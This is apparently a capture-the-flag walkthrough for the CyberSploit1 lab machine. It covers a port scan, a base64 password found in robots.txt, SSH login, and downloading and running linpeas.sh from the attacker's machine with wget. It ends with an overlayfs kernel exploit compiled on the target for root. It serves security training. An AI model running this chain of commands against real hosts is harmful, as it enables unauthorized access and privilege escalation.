CyberSploit1
nmap
(base) [psdon@arch CyberSploit1]$ mkdir nmap
(base) [psdon@arch CyberSploit1]$ sudo rustscan -a 192.168.217.92 --ulimit 5000 -t 2000 -- -T4 -A -oA nmap/all-ports-service-scan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 192.168.217.92:22
Open 192.168.217.92:80 A web server on port 80 is open
Let's checked the source code of the page, and we can find a possible username on there.
Let's also checked the robots.txt and as you can see, we have found a base64 encoded string
We can decode it by executing the following command
(base) [psdon@arch CyberSploit1]$ echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0= | base64 --decode
cybersploit{youtube.com/c/cybersploit}Exploitation
Let's try to log in using the username of itsskv and use the decoded string as a password
(base) [psdon@arch nikto]$ ssh itsskv@192.168.217.92
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.217.92' (ECDSA) to the list of known hosts.
itsskv@192.168.217.92's password: cybersploit{youtube.com/c/cybersploit}
itsskv@cybersploit-CTF:~$ Looks like we have successfully gained an initial shell. Sweet :D
Post Exploitation
First, let's transfer linpeas.sh from our machine to the target machine
(base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/
(base) [psdon@arch linPEAS]$ ls
builder images linpeas.sh README.md
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... You can find the machine IP address by executing the following.
(base) [psdon@arch CyberSploit1]$ ip a | grep tun
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qle
n 500
inet 192.168.49.217/24 scope global tun0
(base) [psdon@arch CyberSploit1]$Then transfer the script using wget
itsskv@cybersploit-CTF:~$ wget http://192.168.49.217/linpeas.sh
--2021-08-27 02:16:13-- http://192.168.49.217/linpeas.sh
Connecting to 192.168.49.217:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 458110 (447K) [application/x-sh]
Saving to: `linpeas.sh'
100%[================================================================>] 4,58,110 147K/s in 3.0s
2021-08-27 02:16:17 (147 KB/s) - `linpeas.sh' saved [458110/458110]
itsskv@cybersploit-CTF:~$ chmod +x linpeas.sh And now we can run linpeas.sh
itsskv@cybersploit-CTF:~$ ./linpeas.sh
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„
â–„â–„â–„â–„ â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„
â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„ â–„
â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„
â–„â–„ â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„
â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„
â–„ â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„
â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„
â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„
â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„ â–„â–„
â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolopRight of the bat, you can see the version of the Linux Kernel it is running.
We can check this Linux Kernel version with searchsploit and I found out it is vulnerable to overlayf exploit.
Privilege Escalation
Let's mirror the exploit to our current working directory, and copy the content of the file to the clipboard
xclip -selection clipboard -i < 37292.cAnd paste it to the target machine
nano e.cWe can compile the C source code using gcc binary installed in the target machine. And right after running the exploit, we got root in the target machine.
Thanks, and enjoy! :D
Last updated
Was this helpful?
